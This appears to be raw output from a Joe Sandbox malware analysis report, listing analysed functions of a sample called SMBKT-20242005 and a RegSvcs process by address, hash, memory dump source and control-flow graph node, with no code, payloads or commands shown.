                          • Instruction ID: c98df7e3092dcd36633a4a19b2cf1d2a2bb5ef574a422370afd23c807331f78b
                          • Opcode Fuzzy Hash: 62dca108fc5301f4c60093962ff15476a768dc815a737778bc55b4cedb38dc32
                          • Instruction Fuzzy Hash: E2E1043292075A8BCB11EBA4D854ADDB7B1FF95310F10C79AE4493B215FB70AAC4CB91
                          Function 04DE8D20 Relevance: .3, Instructions: 264COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7d83b02e1848e8d9ed65b25e4f935a1346c0ac4377f77f71671726dc69576b75
                          • Instruction ID: b1beab64f5d8e1f21c19ee788321e7fcd2d9cade287d0737f700558fd0a29df4
                          • Opcode Fuzzy Hash: 7d83b02e1848e8d9ed65b25e4f935a1346c0ac4377f77f71671726dc69576b75
                          • Instruction Fuzzy Hash: AED1F531920B5A8BCB11EBA4D854ADDB7B1FF95300F10C79AE4093B215FB70AAC4CB91
                          Function 0137DFAC Relevance: .3, Instructions: 264COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 91bac71d23db307362bf588858dcbdbc3198a13a86a1e3f1a767145cb49e0fa2
                          • Instruction ID: 1bc48de96bcc47bafe9f3c30e9e105c92985b479ce7de1e5371319357329e09c
                          • Opcode Fuzzy Hash: 91bac71d23db307362bf588858dcbdbc3198a13a86a1e3f1a767145cb49e0fa2
                          • Instruction Fuzzy Hash: 8BA17132E00219CFCF26DFB9C84059EBBB6FF84304B1545BAE916AB265DB35D905CB40
                          Function 04DE9E51 Relevance: .2, Instructions: 249COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fda63d027a63d8f8a136cf65e891753208647589b18cff36e3409b378f47b808
                          • Instruction ID: 7a2d22c32458a1bde7939671dffb9b91cade2c4e72efade0d06b6886d2aae356
                          • Opcode Fuzzy Hash: fda63d027a63d8f8a136cf65e891753208647589b18cff36e3409b378f47b808
                          • Instruction Fuzzy Hash: 27A128B0E05219DFDB18DFE6D8805AEFBB2FF89300F14956AD515AB264EB349902DF10
                          Function 04DE9E60 Relevance: .2, Instructions: 248COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5697ecb6020644463c9c10b5adf3b13e54bdcd943ecde1508cf24cb895cf499
                          • Instruction ID: 6bc0c173d0739889a9aaeceb87079ec8e355d9bfd08445b626d89722cd9013c0
                          • Opcode Fuzzy Hash: e5697ecb6020644463c9c10b5adf3b13e54bdcd943ecde1508cf24cb895cf499
                          • Instruction Fuzzy Hash: ABA107B0E05219DFDB18DFE6D8805AEFBB2FF89300F10952AD515AB254EB35A902DF10
                          Function 08E9C680 Relevance: .2, Instructions: 184COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 820aa479481738f7fe7e41cb4a335a23e5c14a8fdd3349e390f34d12c5ce9c9a
                          • Instruction ID: fe86f680ed79ff86542a19dd3560e81368b1302d92a6a4505331894d57393a6d
                          • Opcode Fuzzy Hash: 820aa479481738f7fe7e41cb4a335a23e5c14a8fdd3349e390f34d12c5ce9c9a
                          • Instruction Fuzzy Hash: 2781F075E11219CFCB04DFA9C58499EFBF2FF88311F24A56AD419AB221C374AA42CF51
                          Function 08E9C670 Relevance: .2, Instructions: 180COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4da2506c7d9d3d948b9b3b343c95a86c07e96744bd3002647470b8cda5b8f9c1
                          • Instruction ID: a452d640374fba6aeb001906a834cac0dc33abc96811164dec07c8115514f2d2
                          • Opcode Fuzzy Hash: 4da2506c7d9d3d948b9b3b343c95a86c07e96744bd3002647470b8cda5b8f9c1
                          • Instruction Fuzzy Hash: 30811075E11209CFCB44CFA9C58489EFBF2FF88311B24A56AE415AB321D374AA42CF51
                          Function 08E9DA61 Relevance: .2, Instructions: 162COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aaeade58730625b092860e939c2d7bf79585ddb871d7e2d44034642d69b978f9
                          • Instruction ID: a312faf3f81549fee627fbbba9008954af046533bca0569c5f319765cd4a0bde
                          • Opcode Fuzzy Hash: aaeade58730625b092860e939c2d7bf79585ddb871d7e2d44034642d69b978f9
                          • Instruction Fuzzy Hash: FE61F675E052198FCF04CFA9C9809EEFBF2FF89211F28A46AD445B7224D7749A41CB64
                          Function 08E9DA70 Relevance: .2, Instructions: 161COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a612dcd16c15256e394b88428ba31c681c7617a60c870db1a6b366b416657c38
                          • Instruction ID: 345ffc708cc0c877e1f27435fc9d5585ba9747e7151ca5b17ce3faccae713ca5
                          • Opcode Fuzzy Hash: a612dcd16c15256e394b88428ba31c681c7617a60c870db1a6b366b416657c38
                          • Instruction Fuzzy Hash: 7261F775E052198FCF04CFA9D9809EEFBF2FF89211F28A46AD405B7214D7749A41CB64
                          Function 04DE43F8 Relevance: .1, Instructions: 149COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cdc6ce7b01a7cd0a17302a48815fb656e1c400a636c5437f8fbc1ba48e1dddcc
                          • Instruction ID: a9a9b23b146ffd8d49b546e518a35a7735f80c8bd3ef1864b0a77c2b61130823
                          • Opcode Fuzzy Hash: cdc6ce7b01a7cd0a17302a48815fb656e1c400a636c5437f8fbc1ba48e1dddcc
                          • Instruction Fuzzy Hash: 99611A71E002298FDB14DF6AD980AAEFBF6BF89304F14C5AAD848A7315D7309941CF61
                          Function 08E9D211 Relevance: .1, Instructions: 149COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c99ca83db4b0ab157331d529cc8df840b7be4548ed46c8ca18bcfedb93f052af
                          • Instruction ID: 12438100ff1faa97f7ce12725e4016e8d20712b3d6ea14989f2ff5e5ac3d39d1
                          • Opcode Fuzzy Hash: c99ca83db4b0ab157331d529cc8df840b7be4548ed46c8ca18bcfedb93f052af
                          • Instruction Fuzzy Hash: 8D5103B5E0521ACFCF04CFA8C98099EFBF2FB89311F14956AD445AB315C374A941CBA5
                          Function 04DE0007 Relevance: .1, Instructions: 119COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c582bc120f3c542f2f3553648ca9c7db3af2ef4fc85a683b28dca4170e494c8e
                          • Instruction ID: 7864888f438e3547926c8e344503a72c8b3790d174538c61b44c3755b56963e3
                          • Opcode Fuzzy Hash: c582bc120f3c542f2f3553648ca9c7db3af2ef4fc85a683b28dca4170e494c8e
                          • Instruction Fuzzy Hash: E0518871E057558FEB19CF6B8D4528ABBF3AFC9300F18C1BAC448AA265EB3409468F11
                          Function 08E98C58 Relevance: .1, Instructions: 109COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e6cd9096129f4c5f26c2bfb7bf5d7ab641d5841d1e4b34fa6cad1c090934a0a1
                          • Instruction ID: 5112d820dc51d86e8dc6abb89aca47dca854f32e1a30cdb5dd583d297eff83a1
                          • Opcode Fuzzy Hash: e6cd9096129f4c5f26c2bfb7bf5d7ab641d5841d1e4b34fa6cad1c090934a0a1
                          • Instruction Fuzzy Hash: 5C41FA75E006189FEB18DFAAD840ADEBBB7BFC9300F14C4AAD408A7264DB7449418F61
                          Function 04DE0040 Relevance: .1, Instructions: 106COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a2432e08641e448cd9691ec8094653da084ede668ae74ae29f7609bfb3f7e64f
                          • Instruction ID: 9e90064246e4b1a4d7eb31d29b0b1d5e96f9db6452b69ae154e314a291bae952
                          • Opcode Fuzzy Hash: a2432e08641e448cd9691ec8094653da084ede668ae74ae29f7609bfb3f7e64f
                          • Instruction Fuzzy Hash: 73416C71E116188BEB28DF6B8D4439EFBF7BFC9300F14C1BA950CA6215EB3019858E15
                          Function 08E9D888 Relevance: .1, Instructions: 95COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e720aec4b75873a263242da1296db8f5216b922437277c035d85aac145295814
                          • Instruction ID: a2a666a25e1a08b6a4acf91e6b113f40cf3902a0668edaf4cccc688208f36f30
                          • Opcode Fuzzy Hash: e720aec4b75873a263242da1296db8f5216b922437277c035d85aac145295814
                          • Instruction Fuzzy Hash: 4F41E6B1E0421A9FDF08CFAAC8805EEFBF2AB88301F24D169C455B7254D7759A418F94
                          Function 08E9D879 Relevance: .1, Instructions: 94COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4211fd4d583eb4f9c2f8fe804aa1059f5e6122858d783d6d2b2eaa56a0ffc3f5
                          • Instruction ID: 47f5b81e1637f1378de8d50a7e4a7f9d3416c29df3d14acb0b5c8b6f7fa5557e
                          • Opcode Fuzzy Hash: 4211fd4d583eb4f9c2f8fe804aa1059f5e6122858d783d6d2b2eaa56a0ffc3f5
                          • Instruction Fuzzy Hash: 84411571E0421A9FDF08CFAAC8405EEFBF2AF89300F24D06AC455B7254D7749A418F54
                          Function 08E98C48 Relevance: .1, Instructions: 90COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6a9b9ba7c88f683560684fa83913f5ec393d26f37d84c3aeb6ba5e336ddfad6a
                          • Instruction ID: c5b278186463a0f1e0bd29b587cd2ebc9ecb9239d6837d8e15e67fa41967b564
                          • Opcode Fuzzy Hash: 6a9b9ba7c88f683560684fa83913f5ec393d26f37d84c3aeb6ba5e336ddfad6a
                          • Instruction Fuzzy Hash: 4E31E7B5E006189BEB18CFABC8407DEBAF7BFC9300F14C57AD848A6264EB7449418F55
                          Function 04DE7418 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 581da61a3c57976568d110712e0e4a7c4e0ec8cfe780f681c6f102c66ffb081d
                          • Instruction ID: ca5e2b4277df0beee95ed673c1e4ad501222722e31dce0844855c68797e621ba
                          • Opcode Fuzzy Hash: 581da61a3c57976568d110712e0e4a7c4e0ec8cfe780f681c6f102c66ffb081d
                          • Instruction Fuzzy Hash: E5213671E116598BDB08CFABD940A9EFBF7AFC9300F18C06AD408A7215EB345A028B55

                          Execution Graph

                          Execution Coverage:12.1%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:17
                          Total number of Limit Nodes:4
                          execution_graph 22925 1490848 22926 149084e 22925->22926 22927 149091b 22926->22927 22929 149138f 22926->22929 22931 1491393 22929->22931 22930 14914a4 22930->22926 22931->22930 22933 1497fa0 22931->22933 22934 1497faa 22933->22934 22935 1497fc4 22934->22935 22938 6bbfa8f 22934->22938 22942 6bbfaa0 22934->22942 22935->22931 22940 6bbfab5 22938->22940 22939 6bbfcca 22939->22935 22940->22939 22941 6bbfce0 GlobalMemoryStatusEx 22940->22941 22941->22940 22944 6bbfab5 22942->22944 22943 6bbfcca 22943->22935 22944->22943 22945 6bbfce0 GlobalMemoryStatusEx 22944->22945 22945->22944

                          Executed Functions

                          Function 06BB6658 Relevance: .8, Instructions: 835COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43b1cb5f9e7c01b40f490b428be7892718f8fac952e241ab83dbea1ed224e2d5
                          • Instruction ID: cb419fee88aa7dacc8a9bbec0cc60aa73c8710c244121aed2b074d1228c94c3d
                          • Opcode Fuzzy Hash: 43b1cb5f9e7c01b40f490b428be7892718f8fac952e241ab83dbea1ed224e2d5
                          • Instruction Fuzzy Hash: A4627E74B002049FDB54DB68D594ABDB7F2EF88315F14A4AAD406DB390EBB5EC41CB90
                          Function 06BBC1F0 Relevance: .6, Instructions: 645COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1142 6bbc1f0-6bbc210 1143 6bbc212-6bbc215 1142->1143 1144 6bbc217-6bbc230 1143->1144 1145 6bbc235-6bbc238 1143->1145 1144->1145 1146 6bbc23a-6bbc25f 1145->1146 1147 6bbc264-6bbc267 1145->1147 1146->1147 1148 6bbc269-6bbc28e 1147->1148 1149 6bbc293-6bbc296 1147->1149 1148->1149 1152 6bbc309-6bbc312 1149->1152 1153 6bbc298-6bbc29b 1149->1153 1154 6bbc41b-6bbc424 1152->1154 1155 6bbc318 1152->1155 1157 6bbc29d-6bbc2ae 1153->1157 1158 6bbc2b3-6bbc2b6 1153->1158 1163 6bbc42a-6bbc431 1154->1163 1164 6bbc583-6bbc598 1154->1164 1159 6bbc31d-6bbc320 1155->1159 1157->1158 1161 6bbc2b8-6bbc2dc 1158->1161 1162 6bbc2e1-6bbc2e4 1158->1162 1166 6bbc34b-6bbc34e 1159->1166 1167 6bbc322-6bbc346 1159->1167 1161->1162 1169 6bbc2e6-6bbc2ff 1162->1169 1170 6bbc304-6bbc307 1162->1170 1171 6bbc436-6bbc439 1163->1171 1186 6bbc59a-6bbc5bd 1164->1186 1187 6bbc52c-6bbc53f 1164->1187 1174 6bbc35b-6bbc35e 1166->1174 1175 6bbc350-6bbc356 1166->1175 1167->1166 1169->1170 1170->1152 1170->1159 1176 6bbc43b-6bbc43e 1171->1176 1177 6bbc443-6bbc446 1171->1177 1180 6bbc3c0-6bbc3c3 1174->1180 1181 6bbc360-6bbc3bb 1174->1181 1175->1174 1176->1177 1184 6bbc448-6bbc44d 1177->1184 1185 6bbc450-6bbc453 1177->1185 1191 6bbc3cd-6bbc3d0 1180->1191 1192 6bbc3c5-6bbc3c8 1180->1192 1181->1180 1184->1185 1188 6bbc465-6bbc468 1185->1188 1189 6bbc455-6bbc45e 1185->1189 1193 6bbc5bf-6bbc5c2 1186->1193 1207 6bbc544-6bbc547 1187->1207 1199 6bbc46a-6bbc483 1188->1199 1200 6bbc488-6bbc48b 1188->1200 1196 6bbc4b9-6bbc4c2 1189->1196 1197 6bbc460 1189->1197 1202 6bbc3dd-6bbc3e0 1191->1202 1203 6bbc3d2-6bbc3d8 1191->1203 1192->1191 1194 6bbc5e5-6bbc5e8 1193->1194 1195 6bbc5c4-6bbc5e0 1193->1195 1208 6bbc5ea-6bbc603 1194->1208 1209 6bbc608-6bbc60b 1194->1209 1195->1194 1196->1164 1213 6bbc4c8-6bbc4cc 1196->1213 1197->1188 1199->1200 1210 6bbc48d-6bbc492 1200->1210 1211 6bbc495-6bbc498 1200->1211 1205 6bbc3e2-6bbc3e9 1202->1205 1206 6bbc3f0-6bbc3f3 1202->1206 1203->1202 1205->1176 1224 6bbc3eb 1205->1224 1225 6bbc416-6bbc419 1206->1225 1226 6bbc3f5-6bbc411 1206->1226 1216 6bbc559-6bbc55c 1207->1216 1217 6bbc549-6bbc554 1207->1217 1208->1209 1221 6bbc60d-6bbc61b 1209->1221 1222 6bbc622-6bbc625 1209->1222 1210->1211 1219 6bbc49a-6bbc4a9 1211->1219 1220 6bbc4b4-6bbc4b7 1211->1220 1223 6bbc4d1-6bbc4d4 1213->1223 1228 6bbc55e-6bbc561 1216->1228 1229 6bbc566-6bbc568 1216->1229 1217->1216 1219->1228 1251 6bbc4af 1219->1251 1220->1196 1220->1223 1232 6bbc627-6bbc640 1221->1232 1252 6bbc61d 1221->1252 1231 6bbc64d-6bbc650 1222->1231 1222->1232 1233 6bbc4fd-6bbc500 1223->1233 1234 6bbc4d6-6bbc4f8 1223->1234 1224->1206 1225->1154 1225->1171 1226->1225 1228->1229 1240 6bbc56a 1229->1240 1241 6bbc56f-6bbc572 1229->1241 1238 6bbc65d-6bbc65f 1231->1238 1239 6bbc652-6bbc65c 1231->1239 1257 6bbc66f-6bbc67b 1232->1257 1268 6bbc642-6bbc64c 1232->1268 1245 6bbc518-6bbc51b 1233->1245 1246 6bbc502-6bbc513 1233->1246 1234->1233 1247 6bbc661 1238->1247 1248 6bbc666-6bbc669 1238->1248 1240->1241 1241->1143 1250 6bbc578-6bbc582 1241->1250 1245->1189 1255 6bbc521-6bbc524 1245->1255 1246->1245 1247->1248 1248->1193 1248->1257 1251->1220 1252->1222 1255->1207 1260 6bbc526 1255->1260 1261 6bbc81a-6bbc824 1257->1261 1262 6bbc681-6bbc68a 1257->1262 1260->1187 1266 6bbc690-6bbc6af 1262->1266 1267 6bbc825-6bbc85e 1262->1267 1280 6bbc808-6bbc814 1266->1280 1281 6bbc6b5-6bbc6be 1266->1281 1273 6bbc860-6bbc863 1267->1273 1274 6bbc869-6bbc877 1273->1274 1275 6bbca1f-6bbca22 1273->1275 1282 6bbc87e-6bbc880 1274->1282 1278 6bbca45-6bbca47 1275->1278 1279 6bbca24-6bbca40 1275->1279 1283 6bbca49 1278->1283 1284 6bbca4e-6bbca51 1278->1284 1279->1278 1280->1261 1280->1262 1281->1267 1285 6bbc6c4-6bbc6f3 call 6bb6608 1281->1285 1287 6bbc882-6bbc885 1282->1287 1288 6bbc897-6bbc8c1 1282->1288 1283->1284 1284->1273 1289 6bbca57-6bbca60 1284->1289 1301 6bbc735-6bbc74b 1285->1301 1302 6bbc6f5-6bbc72d 1285->1302 1287->1289 1296 6bbc8c7-6bbc8d0 1288->1296 1297 6bbca14-6bbca1e 1288->1297 1299 6bbc9ed-6bbca12 1296->1299 1300 6bbc8d6-6bbc9e5 call 6bb6608 1296->1300 1299->1289 1300->1296 1351 6bbc9eb 1300->1351 1307 6bbc769-6bbc77f 1301->1307 1308 6bbc74d-6bbc761 1301->1308 1302->1301 1316 6bbc79d-6bbc7b0 1307->1316 1317 6bbc781-6bbc795 1307->1317 1308->1307 1323 6bbc7be 1316->1323 1324 6bbc7b2-6bbc7bc 1316->1324 1317->1316 1325 6bbc7c3-6bbc7c5 1323->1325 1324->1325 1327 6bbc7c7-6bbc7cc 1325->1327 1328 6bbc7f6-6bbc802 1325->1328 1329 6bbc7da 1327->1329 1330 6bbc7ce-6bbc7d8 1327->1330 1328->1280 1328->1281 1332 6bbc7df-6bbc7e1 1329->1332 1330->1332 1332->1328 1333 6bbc7e3-6bbc7ef 1332->1333 1333->1328 1351->1297
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1747a3e9b748c41375891fa9045e62437490e1261f3de581a67076ffa885d2c5
                          • Instruction ID: f4b7a6df0acd2484678b8f053e0c9564daa6210aaf6011d6924ee57243e90fc4
                          • Opcode Fuzzy Hash: 1747a3e9b748c41375891fa9045e62437490e1261f3de581a67076ffa885d2c5
                          • Instruction Fuzzy Hash: 7B329070B002058FDF64DF68D890BBEBBB6EB88310F14A569D506EB391DB75EC418B91
                          Function 06BB5650 Relevance: .6, Instructions: 591COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1352 6bb5650-6bb566d 1353 6bb566f-6bb5672 1352->1353 1354 6bb5683-6bb5686 1353->1354 1355 6bb5674-6bb5678 1353->1355 1358 6bb5688-6bb568b 1354->1358 1359 6bb56b0-6bb56b6 1354->1359 1356 6bb5819-6bb5826 1355->1356 1357 6bb567e 1355->1357 1357->1354 1360 6bb568d-6bb5690 1358->1360 1361 6bb5695-6bb5698 1358->1361 1362 6bb56b8 1359->1362 1363 6bb56cc-6bb56d2 1359->1363 1360->1361 1366 6bb56ab-6bb56ae 1361->1366 1367 6bb569a-6bb56a0 1361->1367 1368 6bb56bd-6bb56c0 1362->1368 1364 6bb56d8-6bb56e0 1363->1364 1365 6bb5827-6bb5853 1363->1365 1364->1365 1371 6bb56e6-6bb56f3 1364->1371 1380 6bb585d-6bb5860 1365->1380 1366->1359 1366->1368 1372 6bb578f-6bb5799 1367->1372 1373 6bb56a6 1367->1373 1369 6bb56c2-6bb56c4 1368->1369 1370 6bb56c7-6bb56ca 1368->1370 1369->1370 1370->1363 1374 6bb5702-6bb5705 1370->1374 1371->1365 1376 6bb56f9-6bb56fd 1371->1376 1379 6bb57a0-6bb57a2 1372->1379 1373->1366 1377 6bb571e-6bb5721 1374->1377 1378 6bb5707-6bb5719 1374->1378 1376->1374 1381 6bb5723-6bb5742 1377->1381 1382 6bb5747-6bb574a 1377->1382 1378->1377 1383 6bb57a7-6bb57aa 1379->1383 1386 6bb5878-6bb587b 1380->1386 1387 6bb5862-6bb5873 1380->1387 1381->1382 1384 6bb574c-6bb5762 1382->1384 1385 6bb5767-6bb576a 1382->1385 1389 6bb57ac-6bb57ad 1383->1389 1390 6bb57b2-6bb57b5 1383->1390 1384->1385 1393 6bb5778-6bb577b 1385->1393 1394 6bb576c-6bb5773 1385->1394 1395 6bb588f-6bb5892 1386->1395 1396 6bb587d-6bb5884 1386->1396 1387->1386 1389->1390 1391 6bb57c1-6bb57c4 1390->1391 1392 6bb57b7-6bb57c0 1390->1392 1391->1367 1398 6bb57ca-6bb57cd 1391->1398 1400 6bb578a-6bb578d 1393->1400 1401 6bb577d-6bb5783 1393->1401 1394->1393 1405 6bb58a3-6bb58a6 1395->1405 1406 6bb5894-6bb589e 1395->1406 1403 6bb588a 1396->1403 1404 6bb593e-6bb5945 1396->1404 1409 6bb57cf-6bb57dc 1398->1409 1410 6bb57e1-6bb57e4 1398->1410 1400->1372 1400->1383 1411 6bb57ff-6bb5802 1401->1411 1412 6bb5785 1401->1412 1403->1395 1407 6bb58c8-6bb58cb 1405->1407 1408 6bb58a8-6bb58ac 1405->1408 1406->1405 1416 6bb58cd-6bb58d1 1407->1416 1417 6bb58e5-6bb58e8 1407->1417 1414 6bb58b2-6bb58ba 1408->1414 1415 6bb5946-6bb5983 1408->1415 1409->1410 1418 6bb57fa-6bb57fd 1410->1418 1419 6bb57e6-6bb57f5 1410->1419 1420 6bb5807-6bb5809 1411->1420 1412->1400 1414->1415 1422 6bb58c0-6bb58c3 1414->1422 1434 6bb5985-6bb5988 1415->1434 1416->1415 1423 6bb58d3-6bb58db 1416->1423 1425 6bb58ea-6bb58f1 1417->1425 1426 6bb58f2-6bb58f5 1417->1426 1418->1411 1418->1420 1419->1418 1427 6bb580b 1420->1427 1428 6bb5810-6bb5813 1420->1428 1422->1407 1423->1415 1429 6bb58dd-6bb58e0 1423->1429 1432 6bb590f-6bb5912 1426->1432 1433 6bb58f7-6bb58fb 1426->1433 1427->1428 1428->1353 1428->1356 1429->1417 1436 6bb592c-6bb592e 1432->1436 1437 6bb5914-6bb5918 1432->1437 1433->1415 1435 6bb58fd-6bb5905 1433->1435 1440 6bb598a-6bb599c 1434->1440 1441 6bb59a3-6bb59a6 1434->1441 1435->1415 1442 6bb5907-6bb590a 1435->1442 1438 6bb5930 1436->1438 1439 6bb5935-6bb5938 1436->1439 1437->1415 1443 6bb591a-6bb5922 1437->1443 1438->1439 1439->1380 1439->1404 1445 6bb59a8-6bb59ba 1440->1445 1453 6bb599e 1440->1453 1441->1445 1446 6bb59c5-6bb59c8 1441->1446 1442->1432 1443->1415 1444 6bb5924-6bb5927 1443->1444 1444->1436 1454 6bb5a49-6bb5a4e 1445->1454 1455 6bb59c0 1445->1455 1447 6bb59ca-6bb59dc 1446->1447 1448 6bb59e3-6bb59e6 1446->1448 1458 6bb5a06-6bb5a19 1447->1458 1461 6bb59de 1447->1461 1451 6bb59e8-6bb59fa 1448->1451 1452 6bb5a01-6bb5a04 1448->1452 1451->1454 1468 6bb59fc 1451->1468 1457 6bb5a1c-6bb5a1f 1452->1457 1452->1458 1453->1441 1462 6bb5a51-6bb5a54 1454->1462 1455->1446 1459 6bb5a21-6bb5a24 1457->1459 1460 6bb5a64-6bb5bd0 1457->1460 1464 6bb5a3f-6bb5a42 1459->1464 1465 6bb5a26-6bb5a38 1459->1465 1501 6bb5bd6-6bb5bdd 1460->1501 1502 6bb5d05-6bb5d18 1460->1502 1461->1448 1466 6bb5a5b-6bb5a5e 1462->1466 1467 6bb5a56-6bb5a58 1462->1467 1464->1460 1470 6bb5a44-6bb5a47 1464->1470 1465->1454 1477 6bb5a3a 1465->1477 1466->1460 1471 6bb5d1b-6bb5d1e 1466->1471 1467->1466 1468->1452 1470->1454 1470->1462 1474 6bb5d28-6bb5d2a 1471->1474 1475 6bb5d20-6bb5d25 1471->1475 1478 6bb5d2c 1474->1478 1479 6bb5d31-6bb5d34 